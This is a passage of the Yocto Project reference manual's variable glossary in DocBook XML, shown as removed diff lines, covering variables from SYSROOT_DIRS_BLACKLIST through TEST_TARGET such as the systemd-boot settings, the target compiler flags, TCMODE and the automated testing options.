- <link linkend='var-SYSROOT_DIRS'><filename>SYSROOT_DIRS</filename></link>
- from staging.
- By default, the following directories are not staged:
- <literallayout class='monospaced'>
- SYSROOT_DIRS_BLACKLIST = " \
- ${mandir} \
- ${docdir} \
- ${infodir} \
- ${datadir}/locale \
- ${datadir}/applications \
- ${datadir}/fonts \
- ${datadir}/pixmaps \
- "
- </literallayout>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-SYSROOT_DIRS_NATIVE'><glossterm>SYSROOT_DIRS_NATIVE</glossterm>
- <info>
- SYSROOT_DIRS_NATIVE[doc] = "Extra directories staged into the sysroot by the do_populate_sysroot task for -native recipes, in addition to those specified in SYSROOT_DIRS."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Extra directories staged into the sysroot by the
- <link linkend='ref-tasks-populate_sysroot'><filename>do_populate_sysroot</filename></link>
- task for <filename>-native</filename> recipes, in addition
- to those specified in
- <link linkend='var-SYSROOT_DIRS'><filename>SYSROOT_DIRS</filename></link>.
- By default, the following extra directories are staged:
- <literallayout class='monospaced'>
- SYSROOT_DIRS_NATIVE = " \
- ${bindir} \
- ${sbindir} \
- ${base_bindir} \
- ${base_sbindir} \
- ${libexecdir} \
- ${sysconfdir} \
- ${localstatedir} \
- "
- </literallayout>
- <note>
- Programs built by <filename>-native</filename> recipes
- run directly from the sysroot
- (<link linkend='var-STAGING_DIR_NATIVE'><filename>STAGING_DIR_NATIVE</filename></link>),
- which is why additional directories containing program
- executables and supporting files need to be staged.
- </note>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-SYSROOT_PREPROCESS_FUNCS'><glossterm>SYSROOT_PREPROCESS_FUNCS</glossterm>
- <info>
- SYSROOT_PREPROCESS_FUNCS[doc] = "A list of functions to execute after files are staged into the sysroot. These functions are usually used to apply additional processing on the staged files, or to stage additional files."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- A list of functions to execute after files are staged into
- the sysroot.
- These functions are usually used to apply additional
- processing on the staged files, or to stage additional
- files.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-SYSTEMD_AUTO_ENABLE'><glossterm>SYSTEMD_AUTO_ENABLE</glossterm>
- <info>
- SYSTEMD_AUTO_ENABLE[doc] = "For recipes that inherit the systemd class, this variable specifies whether the specified service in SYSTEMD_SERVICE should start automatically or not."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- When inheriting the
- <link linkend='ref-classes-systemd'><filename>systemd</filename></link>
- class, this variable specifies whether the specified service
- in
- <link linkend='var-SYSTEMD_SERVICE'><filename>SYSTEMD_SERVICE</filename></link>
- should start automatically or not.
- By default, the service is enabled to automatically start
- at boot time.
- The default setting is in the
- <link linkend='ref-classes-systemd'><filename>systemd</filename></link>
- class as follows:
- <literallayout class='monospaced'>
- SYSTEMD_AUTO_ENABLE ??= "enable"
- </literallayout>
- </para>
-
- <para>
- You can disable the service by setting the variable to
- "disable".
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-SYSTEMD_BOOT_CFG'><glossterm>SYSTEMD_BOOT_CFG</glossterm>
- <info>
- SYSTEMD_BOOT_CFG[doc] = "When EFI_PROVIDER is set to "systemd-boot", the SYSTEMD_BOOT_CFG variable specifies the configuration file that should be used."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- When
- <link linkend='var-EFI_PROVIDER'><filename>EFI_PROVIDER</filename></link>
- is set to "systemd-boot", the
- <filename>SYSTEMD_BOOT_CFG</filename> variable specifies the
- configuration file that should be used.
- By default, the
- <link linkend='ref-classes-systemd-boot'><filename>systemd-boot</filename></link>
- class sets the <filename>SYSTEMD_BOOT_CFG</filename> as
- follows:
- <literallayout class='monospaced'>
- SYSTEMD_BOOT_CFG ?= "${<link linkend='var-S'>S</link>}/loader.conf"
- </literallayout>
- </para>
-
- <para>
- For information on Systemd-boot, see the
- <ulink url='http://www.freedesktop.org/wiki/Software/systemd/systemd-boot/'>Systemd-boot documentation</ulink>.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-SYSTEMD_BOOT_ENTRIES'><glossterm>SYSTEMD_BOOT_ENTRIES</glossterm>
- <info>
- SYSTEMD_BOOT_ENTRIES[doc] = "When EFI_PROVIDER is set to "systemd-boot", the SYSTEMD_BOOT_ENTRIES variable specifies a list of entry files (*.conf) to install that contain one boot entry per file."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- When
- <link linkend='var-EFI_PROVIDER'><filename>EFI_PROVIDER</filename></link>
- is set to "systemd-boot", the
- <filename>SYSTEMD_BOOT_ENTRIES</filename> variable specifies
- a list of entry files
- (<filename>*.conf</filename>) to install that contain
- one boot entry per file.
- By default, the
- <link linkend='ref-classes-systemd-boot'><filename>systemd-boot</filename></link>
- class sets the <filename>SYSTEMD_BOOT_ENTRIES</filename> as
- follows:
- <literallayout class='monospaced'>
- SYSTEMD_BOOT_ENTRIES ?= ""
- </literallayout>
- </para>
-
- <para>
- For information on Systemd-boot, see the
- <ulink url='http://www.freedesktop.org/wiki/Software/systemd/systemd-boot/'>Systemd-boot documentation</ulink>.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-SYSTEMD_BOOT_TIMEOUT'><glossterm>SYSTEMD_BOOT_TIMEOUT</glossterm>
- <info>
- SYSTEMD_BOOT_TIMEOUT[doc] = "When EFI_PROVIDER is set to "systemd-boot", the SYSTEMD_BOOT_TIMEOUT variable specifies the boot menu timeout in seconds."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- When
- <link linkend='var-EFI_PROVIDER'><filename>EFI_PROVIDER</filename></link>
- is set to "systemd-boot", the
- <filename>SYSTEMD_BOOT_TIMEOUT</filename> variable specifies
- the boot menu timeout in seconds.
- By default, the
- <link linkend='ref-classes-systemd-boot'><filename>systemd-boot</filename></link>
- class sets the <filename>SYSTEMD_BOOT_TIMEOUT</filename> as
- follows:
- <literallayout class='monospaced'>
- SYSTEMD_BOOT_TIMEOUT ?= "10"
- </literallayout>
- </para>
-
- <para>
- For information on Systemd-boot, see the
- <ulink url='http://www.freedesktop.org/wiki/Software/systemd/systemd-boot/'>Systemd-boot documentation</ulink>.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-SYSTEMD_PACKAGES'><glossterm>SYSTEMD_PACKAGES</glossterm>
- <info>
- SYSTEMD_PACKAGES[doc] = "For recipes that inherit the systemd class, this variable locates the systemd unit files when they are not found in the main recipe's package."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- When inheriting the
- <link linkend='ref-classes-systemd'><filename>systemd</filename></link>
- class, this variable locates the systemd unit files when
- they are not found in the main recipe's package.
- By default, the
- <filename>SYSTEMD_PACKAGES</filename> variable is set
- such that the systemd unit files are assumed to reside in
- the recipes main package:
- <literallayout class='monospaced'>
- SYSTEMD_PACKAGES ?= "${PN}"
- </literallayout>
- </para>
-
- <para>
- If these unit files are not in this recipe's main
- package, you need to use
- <filename>SYSTEMD_PACKAGES</filename> to list the package
- or packages in which the build system can find the systemd
- unit files.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-SYSTEMD_SERVICE'><glossterm>SYSTEMD_SERVICE</glossterm>
- <info>
- SYSTEMD_SERVICE[doc] = "For recipes that inherit the systemd class, this variable specifies the systemd service name for a package."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- When inheriting the
- <link linkend='ref-classes-systemd'><filename>systemd</filename></link>
- class, this variable specifies the systemd service name for
- a package.
- </para>
-
- <para>
- When you specify this file in your recipe, use a package
- name override to indicate the package to which the value
- applies.
- Here is an example from the connman recipe:
- <literallayout class='monospaced'>
- SYSTEMD_SERVICE_${PN} = "connman.service"
- </literallayout>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-SYSVINIT_ENABLED_GETTYS'><glossterm>SYSVINIT_ENABLED_GETTYS</glossterm>
- <info>
- SYSVINIT_ENABLED_GETTYS[doc] = "Specifies which virtual terminals should run a getty, the default is '1'."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- When using
- <ulink url='&YOCTO_DOCS_DEV_URL;#new-recipe-enabling-system-services'>SysVinit</ulink>,
- specifies a space-separated list of the virtual terminals
- that should run a
- <ulink url='http://en.wikipedia.org/wiki/Getty_%28Unix%29'>getty</ulink>
- (allowing login), assuming
- <link linkend='var-USE_VT'><filename>USE_VT</filename></link>
- is not set to "0".
- </para>
-
- <para>
- The default value for
- <filename>SYSVINIT_ENABLED_GETTYS</filename> is "1"
- (i.e. only run a getty on the first virtual terminal).
- </para>
- </glossdef>
- </glossentry>
-
- </glossdiv>
-
- <glossdiv id='var-glossary-t'><title>T</title>
-
- <glossentry id='var-T'><glossterm>T</glossterm>
- <info>
- T[doc] = "This variable points to a directory were BitBake places temporary files, which consist mostly of task logs and scripts, when building a particular recipe."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- This variable points to a directory were BitBake places
- temporary files, which consist mostly of task logs and
- scripts, when building a particular recipe.
- The variable is typically set as follows:
- <literallayout class='monospaced'>
- T = "${WORKDIR}/temp"
- </literallayout>
- </para>
-
- <para>
- The <link linkend='var-WORKDIR'><filename>WORKDIR</filename></link>
- is the directory into which BitBake unpacks and builds the
- recipe.
- The default <filename>bitbake.conf</filename> file sets this variable.</para>
- <para>The <filename>T</filename> variable is not to be confused with
- the <link linkend='var-TMPDIR'><filename>TMPDIR</filename></link> variable,
- which points to the root of the directory tree where BitBake
- places the output of an entire build.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-TARGET_ARCH'><glossterm>TARGET_ARCH</glossterm>
- <info>
- TARGET_ARCH[doc] = "The architecture of the device being built. The OpenEmbedded build system supports the following architectures: arm, mips, ppc, x86, x86-64."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The target machine's architecture.
- The OpenEmbedded build system supports many
- architectures.
- Here is an example list of architectures supported.
- This list is by no means complete as the architecture
- is configurable:
- <literallayout class='monospaced'>
- arm
- i586
- x86_64
- powerpc
- powerpc64
- mips
- mipsel
- </literallayout>
- </para>
-
- <para>
- For additional information on machine architectures, see
- the
- <link linkend='var-TUNE_ARCH'><filename>TUNE_ARCH</filename></link>
- variable.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-TARGET_AS_ARCH'><glossterm>TARGET_AS_ARCH</glossterm>
- <info>
- TARGET_AS_ARCH[doc] = "Specifies architecture-specific assembler flags for the target system."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies architecture-specific assembler flags for the
- target system.
- <filename>TARGET_AS_ARCH</filename> is initialized from
- <link linkend='var-TUNE_ASARGS'><filename>TUNE_ASARGS</filename></link>
- by default in the BitBake configuration file
- (<filename>meta/conf/bitbake.conf</filename>):
- <literallayout class='monospaced'>
- TARGET_AS_ARCH = "${TUNE_ASARGS}"
- </literallayout>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-TARGET_CC_ARCH'><glossterm>TARGET_CC_ARCH</glossterm>
- <info>
- TARGET_CC_ARCH[doc] = "Specifies architecture-specific C compiler flags for the target system."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies architecture-specific C compiler flags for the
- target system.
- <filename>TARGET_CC_ARCH</filename> is initialized from
- <link linkend='var-TUNE_CCARGS'><filename>TUNE_CCARGS</filename></link>
- by default.
- <note>
- It is a common workaround to append
- <link linkend='var-LDFLAGS'><filename>LDFLAGS</filename></link>
- to <filename>TARGET_CC_ARCH</filename>
- in recipes that build software for the target that
- would not otherwise respect the exported
- <filename>LDFLAGS</filename> variable.
- </note>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-TARGET_CC_KERNEL_ARCH'><glossterm>TARGET_CC_KERNEL_ARCH</glossterm>
- <info>
- TARGET_CC_KERNEL_ARCH[doc] = "This is a specific kernel compiler flag for a CPU or Application Binary Interface (ABI) tune."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- This is a specific kernel compiler flag for a CPU or
- Application Binary Interface (ABI) tune.
- The flag is used rarely and only for cases where a
- userspace
- <link linkend='var-TUNE_CCARGS'><filename>TUNE_CCARGS</filename></link>
- is not compatible with the kernel compilation.
- The <filename>TARGET_CC_KERNEL_ARCH</filename> variable
- allows the kernel (and associated modules) to use a
- different configuration.
- See the
- <filename>meta/conf/machine/include/arm/feature-arm-thumb.inc</filename>
- file in the
- <link linkend='source-directory'>Source Directory</link>
- for an example.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-TARGET_CFLAGS'><glossterm>TARGET_CFLAGS</glossterm>
- <info>
- TARGET_CFLAGS[doc] = "Flags passed to the C compiler for the target system. This variable evaluates to the same as CFLAGS."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the flags to pass to the C compiler when building
- for the target.
- When building in the target context,
- <link linkend='var-CFLAGS'><filename>CFLAGS</filename></link>
- is set to the value of this variable by default.
- </para>
-
- <para>
- Additionally, the SDK's environment setup script sets
- the <filename>CFLAGS</filename> variable in the environment
- to the <filename>TARGET_CFLAGS</filename> value so that
- executables built using the SDK also have the flags
- applied.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-TARGET_CPPFLAGS'><glossterm>TARGET_CPPFLAGS</glossterm>
- <info>
- TARGET_CPPFLAGS[doc] = "Specifies the flags to pass to the C pre-processor (i.e. to both the C and the C++ compilers) when building for the target."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the flags to pass to the C pre-processor
- (i.e. to both the C and the C++ compilers) when building
- for the target.
- When building in the target context,
- <link linkend='var-CPPFLAGS'><filename>CPPFLAGS</filename></link>
- is set to the value of this variable by default.
- </para>
-
- <para>
- Additionally, the SDK's environment setup script sets
- the <filename>CPPFLAGS</filename> variable in the
- environment to the <filename>TARGET_CPPFLAGS</filename>
- value so that executables built using the SDK also have
- the flags applied.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-TARGET_CXXFLAGS'><glossterm>TARGET_CXXFLAGS</glossterm>
- <info>
- TARGET_CXXFLAGS[doc] = "Specifies the flags to pass to the C++ compiler when building for the target."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the flags to pass to the C++ compiler when
- building for the target.
- When building in the target context,
- <link linkend='var-CXXFLAGS'><filename>CXXFLAGS</filename></link>
- is set to the value of this variable by default.
- </para>
-
- <para>
- Additionally, the SDK's environment setup script sets
- the <filename>CXXFLAGS</filename> variable in the
- environment to the <filename>TARGET_CXXFLAGS</filename>
- value so that executables built using the SDK also have
- the flags applied.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-TARGET_FPU'><glossterm>TARGET_FPU</glossterm>
- <info>
- TARGET_FPU[doc] = "Specifies the method for handling FPU code. For FPU-less targets, which include most ARM CPUs, the variable must be set to 'soft'. If not, the kernel emulation gets used, which results in a performance penalty."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the method for handling FPU code.
- For FPU-less targets, which include most ARM CPUs, the variable must be
- set to "soft".
- If not, the kernel emulation gets used, which results in a performance penalty.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-TARGET_LD_ARCH'><glossterm>TARGET_LD_ARCH</glossterm>
- <info>
- TARGET_LD_ARCH[doc] = "Specifies architecture-specific linker flags for the target system."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies architecture-specific linker flags for the
- target system.
- <filename>TARGET_LD_ARCH</filename> is initialized from
- <link linkend='var-TUNE_LDARGS'><filename>TUNE_LDARGS</filename></link>
- by default in the BitBake configuration file
- (<filename>meta/conf/bitbake.conf</filename>):
- <literallayout class='monospaced'>
- TARGET_LD_ARCH = "${TUNE_LDARGS}"
- </literallayout>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-TARGET_LDFLAGS'><glossterm>TARGET_LDFLAGS</glossterm>
- <info>
- TARGET_LDFLAGS[doc] = "Specifies the flags to pass to the linker when building for the target."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the flags to pass to the linker when building
- for the target.
- When building in the target context,
- <link linkend='var-LDFLAGS'><filename>LDFLAGS</filename></link>
- is set to the value of this variable by default.
- </para>
-
- <para>
- Additionally, the SDK's environment setup script sets
- the
- <link linkend='var-LDFLAGS'><filename>LDFLAGS</filename></link>
- variable in the environment to the
- <filename>TARGET_LDFLAGS</filename> value so that
- executables built using the SDK also have the flags
- applied.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-TARGET_OS'><glossterm>TARGET_OS</glossterm>
- <info>
- TARGET_OS[doc] = "Specifies the target's operating system."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the target's operating system.
- The variable can be set to "linux" for glibc-based systems
- (GNU C Library) and to "linux-musl" for musl libc.
- For ARM/EABI targets, "linux-gnueabi" and "linux-musleabi"
- possible values exist.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-TARGET_PREFIX'><glossterm>TARGET_PREFIX</glossterm>
- <info>
- TARGET_PREFIX[doc] = "The prefix used for the toolchain binary target tools."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the prefix used for the toolchain binary target
- tools.
- </para>
-
- <para>
- Depending on the type of recipe and the build target,
- <filename>TARGET_PREFIX</filename> is set as follows:
- <itemizedlist>
- <listitem><para>
- For recipes building for the target machine,
- the value is
- "${<link linkend='var-TARGET_SYS'>TARGET_SYS</link>}-".
- </para></listitem>
- <listitem><para>
- For native recipes, the build system sets the
- variable to the value of
- <filename>BUILD_PREFIX</filename>.
- </para></listitem>
- <listitem><para>
- For native SDK recipes
- (<filename>nativesdk</filename>), the
- build system sets the variable to the value of
- <filename>SDK_PREFIX</filename>.
- </para></listitem>
- </itemizedlist>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-TARGET_SYS'><glossterm>TARGET_SYS</glossterm>
- <info>
- TARGET_SYS[doc] = "The target system is comprised of TARGET_ARCH,TARGET_VENDOR and TARGET_OS."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the system, including the architecture and the
- operating system, for which the build is occurring in
- the context of the current recipe.
- </para>
-
- <para>
- The OpenEmbedded build system automatically sets this
- variable based on
- <link linkend='var-TARGET_ARCH'><filename>TARGET_ARCH</filename></link>,
- <link linkend='var-TARGET_VENDOR'><filename>TARGET_VENDOR</filename></link>,
- and
- <link linkend='var-TARGET_OS'><filename>TARGET_OS</filename></link>
- variables.
- <note>
- You do not need to set the
- <filename>TARGET_SYS</filename> variable yourself.
- </note>
- </para>
-
- <para>
- Consider these two examples:
- <itemizedlist>
- <listitem><para>
- Given a native recipe on a 32-bit, x86 machine
- running Linux, the value is "i686-linux".
- </para></listitem>
- <listitem><para>
- Given a recipe being built for a little-endian,
- MIPS target running Linux, the value might be
- "mipsel-linux".
- </para></listitem>
- </itemizedlist>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-TARGET_VENDOR'><glossterm>TARGET_VENDOR</glossterm>
- <info>
- TARGET_VENDOR[doc] = "The name of the target vendor."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the name of the target vendor.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-TCLIBC'><glossterm>TCLIBC</glossterm>
- <info>
- TCLIBC[doc] = "Specifies GNU standard C library (libc) variant to use during the build process. You can select 'glibc', 'musl' or 'newlib'."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the GNU standard C library
- (<filename>libc</filename>) variant to use during the
- build process.
- This variable replaces <filename>POKYLIBC</filename>,
- which is no longer supported.
- </para>
-
- <para>
- You can select "glibc", "musl", "newlib", or "baremetal"
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-TCLIBCAPPEND'><glossterm>TCLIBCAPPEND</glossterm>
- <info>
- TCLIBCAPPEND[doc] = "Specifies a suffix appended to TMPDIR that identifies the libc variant for the build."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies a suffix to be appended onto the
- <link linkend='var-TMPDIR'><filename>TMPDIR</filename></link>
- value.
- The suffix identifies the <filename>libc</filename> variant
- for building.
- When you are building for multiple variants with the same
- <link linkend='build-directory'>Build Directory</link>,
- this mechanism ensures that output for different
- <filename>libc</filename> variants is kept separate to
- avoid potential conflicts.
- </para>
-
- <para>
- In the <filename>defaultsetup.conf</filename> file, the
- default value of <filename>TCLIBCAPPEND</filename> is
- "-${TCLIBC}".
- However, distros such as poky, which normally only support
- one <filename>libc</filename> variant, set
- <filename>TCLIBCAPPEND</filename> to "" in their distro
- configuration file resulting in no suffix being applied.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-TCMODE'><glossterm>TCMODE</glossterm>
- <info>
- TCMODE[doc] = "Enables an external toolchain (where provided by an additional layer) if set to a value other than 'default'."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the toolchain selector.
- <filename>TCMODE</filename> controls the characteristics
- of the generated packages and images by telling the
- OpenEmbedded build system which toolchain profile to use.
- By default, the OpenEmbedded build system builds its own
- internal toolchain.
- The variable's default value is "default", which uses
- that internal toolchain.
- <note>
- If <filename>TCMODE</filename> is set to a value
- other than "default", then it is your responsibility
- to ensure that the toolchain is compatible with the
- default toolchain.
- Using older or newer versions of these components
- might cause build problems.
- See the Release Notes for the Yocto Project release
- for the specific components with which the toolchain
- must be compatible.
- To access the Release Notes, go to the
- <ulink url='&YOCTO_HOME_URL;/software-overview/downloads/'>Downloads</ulink>
- page on the Yocto Project website and click on the
- "RELEASE INFORMATION" link for the appropriate
- release.
- </note>
- </para>
-
- <para>
- The <filename>TCMODE</filename> variable is similar to
- <link linkend='var-TCLIBC'><filename>TCLIBC</filename></link>,
- which controls the variant of the GNU standard C library
- (<filename>libc</filename>) used during the build process:
- <filename>glibc</filename> or <filename>musl</filename>.
- </para>
-
- <para>
- With additional layers, it is possible to use a pre-compiled
- external toolchain.
- One example is the Sourcery G++ Toolchain.
- The support for this toolchain resides in the separate
- <trademark class='registered'>Mentor Graphics</trademark>
- <filename>meta-sourcery</filename> layer at
- <ulink url='http://github.com/MentorEmbedded/meta-sourcery/'></ulink>.
- </para>
-
- <para>
- The layer's <filename>README</filename> file contains
- information on how to use the Sourcery G++ Toolchain as
- an external toolchain.
- In summary, you must be sure to add the layer to your
- <filename>bblayers.conf</filename> file in front of the
- <filename>meta</filename> layer and then set the
- <filename>EXTERNAL_TOOLCHAIN</filename>
- variable in your <filename>local.conf</filename> file
- to the location in which you installed the toolchain.
- </para>
-
- <para>
- The fundamentals used for this example apply to any
- external toolchain.
- You can use <filename>meta-sourcery</filename> as a
- template for adding support for other external toolchains.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-TEST_EXPORT_DIR'><glossterm>TEST_EXPORT_DIR</glossterm>
- <info>
- TEST_EXPORT_DIR[doc] = "The location the OpenEmbedded build system uses to export tests when the TEST_EXPORT_ONLY variable is set to "1"."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The location the OpenEmbedded build system uses to export
- tests when the
- <link linkend='var-TEST_EXPORT_ONLY'><filename>TEST_EXPORT_ONLY</filename></link>
- variable is set to "1".
- </para>
-
- <para>
- The <filename>TEST_EXPORT_DIR</filename> variable defaults
- to <filename>"${TMPDIR}/testimage/${PN}"</filename>.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-TEST_EXPORT_ONLY'><glossterm>TEST_EXPORT_ONLY</glossterm>
- <info>
- TEST_EXPORT_ONLY[doc] = "Specifies to export the tests only. Set this variable to "1" if you do not want to run the tests but you want them to be exported in a manner that you to run them outside of the build system."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies to export the tests only.
- Set this variable to "1" if you do not want to run the
- tests but you want them to be exported in a manner that
- you to run them outside of the build system.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-TEST_LOG_DIR'><glossterm>TEST_LOG_DIR</glossterm>
- <info>
- TEST_LOG_DIR[doc] = "Holds the SSH log and the boot log for QEMU machines. The TEST_LOG_DIR variable defaults to "${WORKDIR}/testimage"."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Holds the SSH log and the boot log for QEMU machines.
- The <filename>TEST_LOG_DIR</filename> variable defaults
- to <filename>"${WORKDIR}/testimage"</filename>.
- <note>
- Actual test results reside in the task log
- (<filename>log.do_testimage</filename>), which is in
- the <filename>${WORKDIR}/temp/</filename> directory.
- </note>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-TEST_POWERCONTROL_CMD'><glossterm>TEST_POWERCONTROL_CMD</glossterm>
- <info>
- TEST_POWERCONTROL_CMD[doc] = "For automated hardware testing, specifies the command to use to control the power of the target machine under test"
- </info>
- <glossdef>
- <para role="glossdeffirst">
- For automated hardware testing, specifies the command to
- use to control the power of the target machine under test.
- Typically, this command would point to a script that
- performs the appropriate action (e.g. interacting
- with a web-enabled power strip).
- The specified command should expect to receive as the last
- argument "off", "on" or "cycle" specifying to power off,
- on, or cycle (power off and then power on) the device,
- respectively.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-TEST_POWERCONTROL_EXTRA_ARGS'><glossterm>TEST_POWERCONTROL_EXTRA_ARGS</glossterm>
- <info>
- TEST_POWERCONTROL_EXTRA_ARGS[doc] = "For automated hardware testing, specifies additional arguments to pass through to the command specified in TEST_POWERCONTROL_CMD"
- </info>
- <glossdef>
- <para role="glossdeffirst">
- For automated hardware testing, specifies additional
- arguments to pass through to the command specified in
- <link linkend='var-TEST_POWERCONTROL_CMD'><filename>TEST_POWERCONTROL_CMD</filename></link>.
- Setting <filename>TEST_POWERCONTROL_EXTRA_ARGS</filename>
- is optional.
- You can use it if you wish, for example, to separate the
- machine-specific and non-machine-specific parts of the
- arguments.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-TEST_QEMUBOOT_TIMEOUT'><glossterm>TEST_QEMUBOOT_TIMEOUT</glossterm>
- <info>
- TEST_QEMUBOOT_TIMEOUT[doc] = "The time in seconds allowed for an image to boot before automated runtime tests begin to run against an image."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The time in seconds allowed for an image to boot before
- automated runtime tests begin to run against an
- image.
- The default timeout period to allow the boot process to
- reach the login prompt is 500 seconds.
- You can specify a different value in the
- <filename>local.conf</filename> file.
- </para>
-
- <para>
- For more information on testing images, see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#performing-automated-runtime-testing'>Performing Automated Runtime Testing</ulink>"
- section in the Yocto Project Development Tasks Manual.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-TEST_SERIALCONTROL_CMD'><glossterm>TEST_SERIALCONTROL_CMD</glossterm>
- <info>
- TEST_SERIALCONTROL_CMD[doc] = "For automated hardware testing, specifies the command to use to connect to the serial console of the target machine under test."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- For automated hardware testing, specifies the command
- to use to connect to the serial console of the target
- machine under test.
- This command simply needs to connect to the serial console
- and forward that connection to standard input and output
- as any normal terminal program does.
- </para>
-
- <para>
- For example, to use the Picocom terminal program on
- serial device <filename>/dev/ttyUSB0</filename> at
- 115200bps, you would set the variable as follows:
- <literallayout class='monospaced'>
- TEST_SERIALCONTROL_CMD = "picocom /dev/ttyUSB0 -b 115200"
- </literallayout>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-TEST_SERIALCONTROL_EXTRA_ARGS'><glossterm>TEST_SERIALCONTROL_EXTRA_ARGS</glossterm>
- <info>
- TEST_SERIALCONTROL_EXTRA_ARGS[doc] = "For automated hardware testing, specifies additional arguments to pass through to the command specified in TEST_SERIALCONTROL_CMD."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- For automated hardware testing, specifies additional
- arguments to pass through to the command specified in
- <link linkend='var-TEST_SERIALCONTROL_CMD'><filename>TEST_SERIALCONTROL_CMD</filename></link>.
- Setting <filename>TEST_SERIALCONTROL_EXTRA_ARGS</filename>
- is optional.
- You can use it if you wish, for example, to separate the
- machine-specific and non-machine-specific parts of the
- command.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-TEST_SERVER_IP'><glossterm>TEST_SERVER_IP</glossterm>
- <info>
- TEST_SERVER_IP[doc] = "The IP address of the build machine (host machine). This IP address is usually automatically detected."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The IP address of the build machine (host machine).
- This IP address is usually automatically detected.
- However, if detection fails, this variable needs to be set
- to the IP address of the build machine (i.e. where
- the build is taking place).
- <note>
- The <filename>TEST_SERVER_IP</filename> variable
- is only used for a small number of tests such as
- the "dnf" test suite, which needs to download
- packages from
- <filename>WORKDIR/oe-rootfs-repo</filename>.
- </note>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-TEST_TARGET'><glossterm>TEST_TARGET</glossterm>
- <info>
- TEST_TARGET[doc] = "For automated runtime testing, specifies the method of deploying the image and running tests on the target machine."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the target controller to use when running tests
- against a test image.
- The default controller to use is "qemu":
- <literallayout class='monospaced'>
- TEST_TARGET = "qemu"
- </literallayout>
- </para>
-
- <para>
- A target controller is a class that defines how an
- image gets deployed on a target and how a target is started.
- A layer can extend the controllers by adding a module
- in the layer's <filename>/lib/oeqa/controllers</filename>
- directory and by inheriting the
- <filename>BaseTarget</filename> class, which is an abstract
- class that cannot be used as a value of
- <filename>TEST_TARGET</filename>.
- </para>
-
- <para>
- You can provide the following arguments with
- <filename>TEST_TARGET</filename>:
- <itemizedlist>
- <listitem><para><emphasis>"qemu":</emphasis>
- Boots a QEMU image and runs the tests.
- See the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#qemu-image-enabling-tests'>Enabling Runtime Tests on QEMU</ulink>"
- section in the Yocto Project Development Tasks
- Manual for more information.
- </para></listitem>
- <listitem><para><emphasis>"simpleremote":</emphasis>
- Runs the tests on target hardware that is already
- up and running.
